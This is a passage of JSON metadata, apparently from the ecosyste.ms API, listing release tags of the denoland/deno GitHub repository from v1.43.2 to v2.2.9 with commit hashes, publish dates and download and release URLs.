2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/